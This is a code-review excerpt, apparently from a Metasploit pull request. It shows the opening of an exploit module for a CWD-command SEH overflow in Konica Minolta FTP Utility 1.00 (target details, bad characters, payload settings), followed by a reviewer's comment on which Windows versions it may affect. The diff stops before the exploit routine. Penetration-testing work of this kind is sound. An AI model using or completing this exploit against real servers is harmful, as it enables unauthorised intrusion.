modules/exploits/windows/ftp/kmftp_utility_cwd.rb

```diff
@@ -0,0 +1,81 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Ftp
+  include Msf::Exploit::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow',
+      'Description' => %q{
+          This module exploits a SEH overflow in Konica Minolta FTP Server 1.00.
+        Konica Minolta FTP fails to check input size when parsing 'CWD' commands, which
+        leads to a SEH overflow.  Konica FTP allows anonymous access by default; valid
+        credentials are typically unnecessary to exploit this vulnerability.
+      },
+      'Author' =>
+        [
+          'Shankar Damodaran', # stack buffer overflow dos p.o.c
+          'Muhamad Fadzil Ramli <mind1355[at]gmail.com>' # seh overflow, metasploit module
+        ],
+      'License' => MSF_LICENSE,
+      'References' =>
+        [
+          [ 'EBD', '37908' ],
+          [ 'URL', 'https://www.exploit-db.com/exploits/37908/' ]
+        ],
+      'Privileged' => false,
+      'Payload' =>
+        {
+          'Space' => 1500,
+          'BadChars' => "\x00\x0a\x2f\x5c",
+          'DisableNops' => true
+        },
+      'Platform' => 'win',
+      'Targets' =>
+        [
+          [
+            'Windows 7 SP1 x86',
```

Comment:
My gut feeling tells me this works for other windows systems too as long as the target FTP server version is 1.0. I'll let @MSadek-r7 double check :-)